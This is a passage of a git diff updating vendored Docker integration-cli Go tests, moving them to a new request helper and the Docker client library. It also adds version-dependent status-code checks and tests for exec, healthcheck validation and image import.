versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) + } - name = "test2" + buf, err = request.ReadBody(body) + c.Assert(err, checker.IsNil) + + expected = fmt.Sprintf("Timeout in Healthcheck cannot be less than %s", container.MinimumDuration) + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) + + // test invalid Retries in Healthcheck: less than 0 + name = "test4" config = 
map[string]interface{}{ "Image": "busybox", - "Env": []string{"=", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, - "Cmd": []string{"true"}, + "Healthcheck": map[string]interface{}{ + "Interval": time.Second, + "Timeout": time.Second, + "Retries": int(-10), + }, } - status, body, err = sockRequest("POST", "/containers/create?name="+name, config) + res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - expected = "invalid environment variable: =" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) + } + + buf, err = request.ReadBody(body) + c.Assert(err, checker.IsNil) + + expected = "Retries in Healthcheck cannot be negative" + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) + // test invalid StartPeriod in Healthcheck: not 0 and less than 1ms name = "test3" config = map[string]interface{}{ "Image": "busybox", - "Env": []string{"=foo", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, - "Cmd": []string{"true"}, + "Healthcheck": map[string]interface{}{ + "Interval": time.Second, + "Timeout": time.Second, + "Retries": int(1000), + "StartPeriod": 100 * time.Microsecond, + }, } - status, body, err = sockRequest("POST", "/containers/create?name="+name, config) + res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - expected = "invalid environment variable: =foo" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, 
http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) + } + + buf, err = request.ReadBody(body) + c.Assert(err, checker.IsNil) + + expected = fmt.Sprintf("StartPeriod in Healthcheck cannot be less than %s", container.MinimumDuration) + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go deleted file mode 100644 index 3891c87379..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go +++ /dev/null @@ -1,73 +0,0 @@ -package main - -import ( - "encoding/json" - "io" - "net/http" - "net/url" - "strconv" - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestEventsAPIEmptyOutput(c *check.C) { - type apiResp struct { - resp *http.Response - err error - } - chResp := make(chan *apiResp) - go func() { - resp, body, err := sockRequestRaw("GET", "/events", nil, "") - body.Close() - chResp <- &apiResp{resp, err} - }() - - select { - case r := <-chResp: - c.Assert(r.err, checker.IsNil) - c.Assert(r.resp.StatusCode, checker.Equals, http.StatusOK) - case <-time.After(3 * time.Second): - c.Fatal("timeout waiting for events api to respond, should have responded immediately") - } -} - -func (s *DockerSuite) TestEventsAPIBackwardsCompatible(c *check.C) { - since := daemonTime(c).Unix() - ts := strconv.FormatInt(since, 10) - - out, _ := runSleepingContainer(c, "--name=foo", "-d") - containerID := strings.TrimSpace(out) - c.Assert(waitRun(containerID), checker.IsNil) - - q := url.Values{} - q.Set("since", ts) - - _, body, err := sockRequestRaw("GET", "/events?"+q.Encode(), nil, "") - c.Assert(err, checker.IsNil) - defer body.Close() - - dec := json.NewDecoder(body) - var containerCreateEvent 
*jsonmessage.JSONMessage - for { - var event jsonmessage.JSONMessage - if err := dec.Decode(&event); err != nil { - if err == io.EOF { - break - } - c.Fatal(err) - } - if event.Status == "create" && event.ID == containerID { - containerCreateEvent = &event - break - } - } - - c.Assert(containerCreateEvent, checker.Not(checker.IsNil)) - c.Assert(containerCreateEvent.Status, checker.Equals, "create") - c.Assert(containerCreateEvent.ID, checker.Equals, containerID) - c.Assert(containerCreateEvent.From, checker.Equals, "busybox") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go index cf4dded483..2db3d3e317 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go @@ -9,7 +9,9 @@ import ( "strings" "sync" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -19,9 +21,13 @@ func (s *DockerSuite) TestExecResizeAPIHeightWidthNoInt(c *check.C) { cleanedContainerID := strings.TrimSpace(out) endpoint := "/exec/" + cleanedContainerID + "/resize?h=foo&w=bar" - status, _, err := sockRequest("POST", endpoint, nil) + res, _, err := request.Post(endpoint) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } } // Part of #14845 @@ -35,16 +41,19 @@ func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) { "Cmd": []string{"/bin/sh"}, } uri := fmt.Sprintf("/containers/%s/exec", name) - 
status, body, err := sockRequest("POST", uri, data) + res, body, err := request.Post(uri, request.JSONBody(data)) if err != nil { return err } - if status != http.StatusCreated { - return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, status) + if res.StatusCode != http.StatusCreated { + return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, res.StatusCode) } + buf, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) + out := map[string]string{} - err = json.Unmarshal(body, &out) + err = json.Unmarshal(buf, &out) if err != nil { return fmt.Errorf("ExecCreate returned invalid json. Error: %q", err.Error()) } @@ -55,23 +64,24 @@ func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) { } payload := bytes.NewBufferString(`{"Tty":true}`) - conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json") + conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json", daemonHost()) if err != nil { return fmt.Errorf("Failed to start the exec: %q", err.Error()) } defer conn.Close() - _, rc, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), nil, "text/plain") - // It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned. - if err == io.ErrUnexpectedEOF { - return fmt.Errorf("The daemon might have crashed.") + _, rc, err := request.Post(fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), request.ContentType("text/plain")) + if err != nil { + // It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned. + if err == io.ErrUnexpectedEOF { + return fmt.Errorf("The daemon might have crashed.") + } + // Other error happened, should be reported. + return fmt.Errorf("Fail to exec resize immediately after start. 
Error: %q", err.Error()) } - if err == nil { - rc.Close() - } + rc.Close() - // We only interested in the io.ErrUnexpectedEOF error, so we return nil otherwise. return nil } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go index 716e9ac68f..118f9971a7 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go @@ -4,13 +4,20 @@ package main import ( "bytes" + "context" "encoding/json" "fmt" + "io/ioutil" "net/http" + "os" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -19,12 +26,18 @@ func (s *DockerSuite) TestExecAPICreateNoCmd(c *check.C) { name := "exec_test" dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") - status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": nil}) + res, body, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.JSONBody(map[string]interface{}{"Cmd": nil})) + c.Assert(err, checker.IsNil) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) comment := check.Commentf("Expected message when creating exec command with no Cmd specified") - c.Assert(getErrorMessage(c, body), checker.Contains, "No exec command specified", comment) + c.Assert(getErrorMessage(c, b), 
checker.Contains, "No exec command specified", comment) } func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) { @@ -36,11 +49,14 @@ func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) { c.Fatalf("Can not encode data to json %s", err) } - res, body, err := sockRequestRaw("POST", fmt.Sprintf("/containers/%s/exec", name), jsonData, "text/plain") + res, body, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.RawContent(ioutil.NopCloser(jsonData)), request.ContentType("test/plain")) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) - - b, err := readBody(body) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) comment := check.Commentf("Expected message when creating exec command with invalid Content-Type specified") @@ -54,16 +70,22 @@ func (s *DockerSuite) TestExecAPICreateContainerPaused(c *check.C) { dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") dockerCmd(c, "pause", name) - status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}}) + + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusConflict) + defer cli.Close() + + config := types.ExecConfig{ + Cmd: []string{"true"}, + } + _, err = cli.ContainerExecCreate(context.Background(), name, config) comment := check.Commentf("Expected message when creating exec command with Container %s is paused", name) - c.Assert(getErrorMessage(c, body), checker.Contains, "Container "+name+" is paused, unpause the container before exec", comment) + c.Assert(err.Error(), checker.Contains, "Container "+name+" is paused, unpause the container before 
exec", comment) } func (s *DockerSuite) TestExecAPIStart(c *check.C) { - testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvagable to Windows to Windows CI + testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvageable to Windows to Windows CI dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") id := createExec(c, "test") @@ -94,7 +116,7 @@ func (s *DockerSuite) TestExecAPIStartEnsureHeaders(c *check.C) { dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") id := createExec(c, "test") - resp, _, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json") + resp, _, err := request.Post(fmt.Sprintf("/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.JSON) c.Assert(err, checker.IsNil) c.Assert(resp.Header.Get("Server"), checker.Not(checker.Equals), "") } @@ -104,10 +126,10 @@ func (s *DockerSuite) TestExecAPIStartBackwardsCompatible(c *check.C) { runSleepingContainer(c, "-d", "--name", "test") id := createExec(c, "test") - resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/v1.20/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "text/plain") + resp, body, err := request.Post(fmt.Sprintf("/v1.20/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.ContentType("text/plain")) c.Assert(err, checker.IsNil) - b, err := readBody(body) + b, err := request.ReadBody(body) comment := check.Commentf("response body: %s", b) c.Assert(err, checker.IsNil, comment) c.Assert(resp.StatusCode, checker.Equals, http.StatusOK, comment) @@ -118,21 +140,7 @@ func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) { runSleepingContainer(c, "-d", "--name", "test") execID := createExec(c, "test") startExec(c, execID, http.StatusOK) - - timeout := time.After(60 * time.Second) - var execJSON struct{ Running bool } - for { - select { - case <-timeout: - c.Fatal("timeout waiting for exec to start") - default: - } - - 
inspectExec(c, execID, &execJSON) - if !execJSON.Running { - break - } - } + waitForExec(c, execID) startExec(c, execID, http.StatusConflict) } @@ -141,36 +149,117 @@ func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) { func (s *DockerSuite) TestExecAPIStartWithDetach(c *check.C) { name := "foo" runSleepingContainer(c, "-d", "-t", "--name", name) - data := map[string]interface{}{ - "cmd": []string{"true"}, - "AttachStdin": true, + + config := types.ExecConfig{ + Cmd: []string{"true"}, + AttachStderr: true, } - _, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), data) - c.Assert(err, checker.IsNil, check.Commentf(string(b))) - createResp := struct { - ID string `json:"Id"` - }{} - c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b))) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - _, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", createResp.ID), strings.NewReader(`{"Detach": true}`), "application/json") + createResp, err := cli.ContainerExecCreate(context.Background(), name, config) c.Assert(err, checker.IsNil) - b, err = readBody(body) + _, body, err := request.Post(fmt.Sprintf("/exec/%s/start", createResp.ID), request.RawString(`{"Detach": true}`), request.JSON) + c.Assert(err, checker.IsNil) + + b, err := request.ReadBody(body) comment := check.Commentf("response body: %s", b) c.Assert(err, checker.IsNil, comment) - resp, _, err := sockRequestRaw("GET", "/_ping", nil, "") + resp, _, err := request.Get("/_ping") c.Assert(err, checker.IsNil) if resp.StatusCode != http.StatusOK { c.Fatal("daemon is down, it should alive") } } +// #30311 +func (s *DockerSuite) TestExecAPIStartValidCommand(c *check.C) { + name := "exec_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + id := createExecCmd(c, name, "true") + startExec(c, id, http.StatusOK) + + waitForExec(c, id) + + var inspectJSON struct{ ExecIDs []string } + 
inspectContainer(c, name, &inspectJSON) + + c.Assert(inspectJSON.ExecIDs, checker.IsNil) +} + +// #30311 +func (s *DockerSuite) TestExecAPIStartInvalidCommand(c *check.C) { + name := "exec_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + id := createExecCmd(c, name, "invalid") + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + startExec(c, id, http.StatusNotFound) + } else { + startExec(c, id, http.StatusBadRequest) + } + waitForExec(c, id) + + var inspectJSON struct{ ExecIDs []string } + inspectContainer(c, name, &inspectJSON) + + c.Assert(inspectJSON.ExecIDs, checker.IsNil) +} + +func (s *DockerSuite) TestExecStateCleanup(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + // This test checks accidental regressions. Not part of stable API. + + name := "exec_cleanup" + cid, _ := dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + cid = strings.TrimSpace(cid) + + stateDir := "/var/run/docker/containerd/" + cid + + checkReadDir := func(c *check.C) (interface{}, check.CommentInterface) { + fi, err := ioutil.ReadDir(stateDir) + c.Assert(err, checker.IsNil) + return len(fi), nil + } + + fi, err := ioutil.ReadDir(stateDir) + c.Assert(err, checker.IsNil) + c.Assert(len(fi), checker.GreaterThan, 1) + + id := createExecCmd(c, name, "ls") + startExec(c, id, http.StatusOK) + waitForExec(c, id) + + waitAndAssert(c, 5*time.Second, checkReadDir, checker.Equals, len(fi)) + + id = createExecCmd(c, name, "invalid") + startExec(c, id, http.StatusBadRequest) + waitForExec(c, id) + + waitAndAssert(c, 5*time.Second, checkReadDir, checker.Equals, len(fi)) + + dockerCmd(c, "stop", name) + _, err = os.Stat(stateDir) + c.Assert(err, checker.NotNil) + c.Assert(os.IsNotExist(err), checker.True) +} + func createExec(c *check.C, name string) string { - _, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}}) - c.Assert(err, checker.IsNil, 
check.Commentf(string(b))) + return createExecCmd(c, name, "true") +} +func createExecCmd(c *check.C, name string, cmd string) string { + _, reader, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.JSONBody(map[string]interface{}{"Cmd": []string{cmd}})) + c.Assert(err, checker.IsNil) + b, err := ioutil.ReadAll(reader) + c.Assert(err, checker.IsNil) + defer reader.Close() createResp := struct { ID string `json:"Id"` }{} @@ -179,17 +268,43 @@ func createExec(c *check.C, name string) string { } func startExec(c *check.C, id string, code int) { - resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json") + resp, body, err := request.Post(fmt.Sprintf("/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.JSON) c.Assert(err, checker.IsNil) - b, err := readBody(body) + b, err := request.ReadBody(body) comment := check.Commentf("response body: %s", b) c.Assert(err, checker.IsNil, comment) c.Assert(resp.StatusCode, checker.Equals, code, comment) } func inspectExec(c *check.C, id string, out interface{}) { - resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/exec/%s/json", id), nil, "") + resp, body, err := request.Get(fmt.Sprintf("/exec/%s/json", id)) + c.Assert(err, checker.IsNil) + defer body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + err = json.NewDecoder(body).Decode(out) + c.Assert(err, checker.IsNil) +} + +func waitForExec(c *check.C, id string) { + timeout := time.After(60 * time.Second) + var execJSON struct{ Running bool } + for { + select { + case <-timeout: + c.Fatal("timeout waiting for exec to start") + default: + } + + inspectExec(c, id, &execJSON) + if !execJSON.Running { + break + } + } +} + +func inspectContainer(c *check.C, id string, out interface{}) { + resp, body, err := request.Get(fmt.Sprintf("/containers/%s/json", id)) c.Assert(err, checker.IsNil) defer body.Close() c.Assert(resp.StatusCode, checker.Equals, 
http.StatusOK) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go index b7617eae25..da1c8c8f28 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go @@ -1,33 +1,40 @@ package main import ( - "encoding/json" + "context" "net/http" - "net/url" + "net/http/httptest" "strings" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) func (s *DockerSuite) TestAPIImagesFilter(c *check.C) { + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + name := "utest:tag1" name2 := "utest/docker:tag2" name3 := "utest:5000/docker:tag3" for _, n := range []string{name, name2, name3} { dockerCmd(c, "tag", "busybox", n) } - type image types.ImageSummary - getImages := func(filter string) []image { - v := url.Values{} - v.Set("filter", filter) - status, b, err := sockRequest("GET", "/images/json?"+v.Encode(), nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - - var images []image - err = json.Unmarshal(b, &images) + getImages := func(filter string) []types.ImageSummary { + filters := filters.NewArgs() + filters.Add("reference", filter) + options := types.ImageListOptions{ + All: false, + Filters: filters, + } + images, err := cli.ImageList(context.Background(), options) c.Assert(err, checker.IsNil) return images @@ -48,80 +55,106 @@ func (s *DockerSuite) TestAPIImagesFilter(c *check.C) { } func (s *DockerSuite) TestAPIImagesSaveAndLoad(c *check.C) 
{ - // TODO Windows to Windows CI: Investigate further why this test fails. testRequires(c, Network) - testRequires(c, DaemonIsLinux) - out, err := buildImage("saveandload", "FROM busybox\nENV FOO bar", false) - c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + buildImageSuccessfully(c, "saveandload", build.WithDockerfile("FROM busybox\nENV FOO bar")) + id := getIDByName(c, "saveandload") - res, body, err := sockRequestRaw("GET", "/images/"+id+"/get", nil, "") + res, body, err := request.Get("/images/" + id + "/get") c.Assert(err, checker.IsNil) defer body.Close() c.Assert(res.StatusCode, checker.Equals, http.StatusOK) dockerCmd(c, "rmi", id) - res, loadBody, err := sockRequestRaw("POST", "/images/load", body, "application/x-tar") + res, loadBody, err := request.Post("/images/load", request.RawContent(body), request.ContentType("application/x-tar")) c.Assert(err, checker.IsNil) defer loadBody.Close() c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - inspectOut := inspectField(c, id, "Id") + inspectOut := cli.InspectCmd(c, id, cli.Format(".Id")).Combined() c.Assert(strings.TrimSpace(string(inspectOut)), checker.Equals, id, check.Commentf("load did not work properly")) } func (s *DockerSuite) TestAPIImagesDelete(c *check.C) { - if daemonPlatform != "windows" { + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + if testEnv.OSType != "windows" { testRequires(c, Network) } name := "test-api-images-delete" - out, err := buildImage(name, "FROM busybox\nENV FOO bar", false) - c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV FOO bar")) + id := getIDByName(c, name) dockerCmd(c, "tag", name, "test:tag1") - status, _, err := sockRequest("DELETE", "/images/"+id, nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusConflict) + _, err = cli.ImageRemove(context.Background(), id, types.ImageRemoveOptions{}) + 
c.Assert(err.Error(), checker.Contains, "unable to delete") - status, _, err = sockRequest("DELETE", "/images/test:noexist", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNotFound) //Status Codes:404 – no such image + _, err = cli.ImageRemove(context.Background(), "test:noexist", types.ImageRemoveOptions{}) + c.Assert(err.Error(), checker.Contains, "No such image") - status, _, err = sockRequest("DELETE", "/images/test:tag1", nil) + _, err = cli.ImageRemove(context.Background(), "test:tag1", types.ImageRemoveOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) } func (s *DockerSuite) TestAPIImagesHistory(c *check.C) { - if daemonPlatform != "windows" { + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + if testEnv.OSType != "windows" { testRequires(c, Network) } name := "test-api-images-history" - out, err := buildImage(name, "FROM busybox\nENV FOO bar", false) + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV FOO bar")) + id := getIDByName(c, name) + + historydata, err := cli.ImageHistory(context.Background(), id) c.Assert(err, checker.IsNil) - id := strings.TrimSpace(out) + c.Assert(historydata, checker.Not(checker.HasLen), 0) + var found bool + for _, tag := range historydata[0].Tags { + if tag == "test-api-images-history:latest" { + found = true + break + } + } + c.Assert(found, checker.True) +} - status, body, err := sockRequest("GET", "/images/"+id+"/history", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) +func (s *DockerSuite) TestAPIImagesImportBadSrc(c *check.C) { + testRequires(c, Network, SameHostDaemon) - var historydata []types.ImageHistory - err = json.Unmarshal(body, &historydata) - c.Assert(err, checker.IsNil, check.Commentf("Error on unmarshal")) + server := httptest.NewServer(http.NewServeMux()) + defer server.Close() + + tt := []struct { + statusExp int + fromSrc string + 
}{ + {http.StatusNotFound, server.URL + "/nofile.tar"}, + {http.StatusNotFound, strings.TrimPrefix(server.URL, "http://") + "/nofile.tar"}, + {http.StatusNotFound, strings.TrimPrefix(server.URL, "http://") + "%2Fdata%2Ffile.tar"}, + {http.StatusInternalServerError, "%2Fdata%2Ffile.tar"}, + } + + for _, te := range tt { + res, _, err := request.Post(strings.Join([]string{"/images/create?fromSrc=", te.fromSrc}, ""), request.JSON) + c.Assert(err, check.IsNil) + c.Assert(res.StatusCode, checker.Equals, te.statusExp) + c.Assert(res.Header.Get("Content-Type"), checker.Equals, "application/json") + } - c.Assert(historydata, checker.Not(checker.HasLen), 0) - c.Assert(historydata[0].Tags[0], checker.Equals, "test-api-images-history:latest") } // #14846 func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) { testRequires(c, Network) - res, b, err := sockRequestRaw("GET", "/images/search?term=test", nil, "application/json") + res, b, err := request.Get("/images/search?term=test", request.JSON) c.Assert(err, check.IsNil) b.Close() c.Assert(res.StatusCode, checker.Equals, http.StatusOK) @@ -131,32 +164,21 @@ func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) { // Test case for 30027: image size reported as -1 in v1.12 client against v1.13 daemon. // This test checks to make sure both v1.12 and v1.13 client against v1.13 daemon get correct `Size` after the fix. 
func (s *DockerSuite) TestAPIImagesSizeCompatibility(c *check.C) { - status, b, err := sockRequest("GET", "/images/json", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var images []types.ImageSummary - err = json.Unmarshal(b, &images) + apiclient := testEnv.APIClient() + defer apiclient.Close() + + images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{}) c.Assert(err, checker.IsNil) c.Assert(len(images), checker.Not(checker.Equals), 0) for _, image := range images { c.Assert(image.Size, checker.Not(checker.Equals), int64(-1)) } - type v124Image struct { - ID string `json:"Id"` - ParentID string `json:"ParentId"` - RepoTags []string - RepoDigests []string - Created int64 - Size int64 - VirtualSize int64 - Labels map[string]string - } - status, b, err = sockRequest("GET", "/v1.24/images/json", nil) + apiclient, err = client.NewClientWithOpts(client.FromEnv, client.WithVersion("v1.24")) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var v124Images []v124Image - err = json.Unmarshal(b, &v124Images) + defer apiclient.Close() + + v124Images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{}) c.Assert(err, checker.IsNil) c.Assert(len(v124Images), checker.Not(checker.Equals), 0) for _, image := range v124Images { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go deleted file mode 100644 index 1556099734..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go +++ /dev/null @@ -1,53 +0,0 @@ -package main - -import ( - "net/http" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestInfoAPI(c *check.C) { - endpoint := "/info" - - status, body, err := sockRequest("GET", endpoint, nil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(err, 
checker.IsNil) - - // always shown fields - stringsToCheck := []string{ - "ID", - "Containers", - "ContainersRunning", - "ContainersPaused", - "ContainersStopped", - "Images", - "LoggingDriver", - "OperatingSystem", - "NCPU", - "OSType", - "Architecture", - "MemTotal", - "KernelVersion", - "Driver", - "ServerVersion", - "SecurityOptions"} - - out := string(body) - for _, linePrefix := range stringsToCheck { - c.Assert(out, checker.Contains, linePrefix) - } -} - -func (s *DockerSuite) TestInfoAPIVersioned(c *check.C) { - testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later - endpoint := "/v1.20/info" - - status, body, err := sockRequest("GET", endpoint, nil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(err, checker.IsNil) - - out := string(body) - c.Assert(out, checker.Contains, "ExecutionDriver") - c.Assert(out, checker.Contains, "not supported") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go index 546b224c92..68055b6c14 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go @@ -1,15 +1,17 @@ package main import ( + "context" "encoding/json" - "net/http" "strings" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/versions/v1p20" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) { @@ -26,7 +28,7 @@ func (s *DockerSuite) TestInspectAPIContainerResponse(c *check.C) { var cases []acase - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { cases = []acase{ {"v1.25", append(keysBase, 
